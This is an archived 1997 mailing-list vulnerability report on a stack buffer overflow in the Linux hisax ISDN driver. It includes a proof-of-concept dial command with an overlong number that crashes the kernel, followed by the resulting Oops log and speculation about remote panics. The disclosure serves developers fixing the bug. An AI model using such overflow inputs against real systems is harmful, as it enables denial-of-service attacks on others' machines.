Buffer overflow in 2.0.31-pre3 / hisax ISDN driver

Frohwalt Egerer (froh@twins.iconsult.com)
12 Aug 1997 19:43:58 +0200

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Linus Torvalds: "Re: patch for fs/dcache race"
Previous message: Colin Plumb: "Re: patch for fs/dcache race"

There's at least on buffer overflow in the hisax ISDN driver. From reading
the source there seem to be a lot of these:

linux/drivers/isdn/hisax/l3dss1.c l3dss1_setup_req() uses a 128 byte
buffer on the stack to build a ISDN message. This buffer is being filled
with the construct *p++ without boundary checks. Besides other things
user specified telephone numbers are copied into that buffer, so
exploiting this is trivial:

<Install DSS1 line, teles card and hisax kernel module ...>
[root@elvis /root]# tail -f /var/log/messages &
<... blurb removed ...>
[root@elvis /root]# seyon -modem /dev/ttyI0 -noemulator

Locating Modems...
>> Error: Could not get linux serial info: Invalid argument.
>> Warning: invalid default BPS value: 9600.
Modem ``/dev/ttyI0'' is Available.

at&e0
OK
atd999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999Aug 12 19:33:46 elvis kernel: Unable to handle kernel paging request at virtual address f9393939
<... Rest of OOPS removed ...>

Voila, InstantOops (TM). For your convenciance the full Oops massage
is appended below. Since the *foo++ = bar; method is used at several
places in the HiSax driver there seem to be a lot more of these
overflows.

For example, I think sending a ISDN Message that produces more than 4k
debug log might be a convenient way to panic any Linux box connected
to DSS.1 using the HiSax driver. I didn't verify this, though.

Froh

P.S.:

Aug 12 19:33:46 elvis kernel: Unable to handle kernel paging request at virtual address f9393939
Aug 12 19:33:46 elvis kernel: current->tss.cr3 = 0086b000, (r3 = 0086b000
Aug 12 19:33:46 elvis kernel: *pde = 00000000
Aug 12 19:33:46 elvis kernel: Oops: 0000
Aug 12 19:33:46 elvis kernel: CPU: 0
Aug 12 19:33:46 elvis kernel: EIP: 0010:[vsprintf+763/1232]
Aug 12 19:33:46 elvis kernel: EFLAGS: 00010097
Aug 12 19:33:46 elvis kernel: eax: 39393939 ebx: ffffffff ecx: 39393939 edx: fffffffe
Aug 12 19:33:46 elvis kernel: esi: ffffffff edi: 00f21e28 ebp: 00000000 esp: 00f21da0
Aug 12 19:33:46 elvis kernel: ds: 0018 es: 0018 fs: 002b gs: 002b ss: 0018
Aug 12 19:33:46 elvis kernel: Process seyon (pid: 26709, process nr: 51, stackpage=00f21000)
Aug 12 19:33:46 elvis kernel: Stack: 00000000 39393939 00f21e28 00021094 0002114c 00021094 00f21e94 ffffffff
Aug 12 19:33:46 elvis kernel: 0000001b 0188af87 00186d64 00f21e28 0188abbe 00f21de8 0188228e 00f21e28
Aug 12 19:33:46 elvis kernel: 0188abbd 39393939 00f21e1c 00f21e1c 00f21e1c 0002114c 00021094 00f21f95
Aug 12 19:33:47 elvis kernel: Call Trace: [<0188af87>] [sprintf+20/24] [<0188abbe>] [<0188228e>] [<0188abbd>] [system_call+82/128]
Aug 12 19:33:47 elvis kernel: Code: 80 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 89 c6 f7 c5 10 00

-- Frohwalt Egerer

The only thing scarier than a sysadmin with a screwdriver is a programmer with the root password. -- Steve Barnet

Next message: Linus Torvalds: "Re: patch for fs/dcache race"
Previous message: Colin Plumb: "Re: patch for fs/dcache race"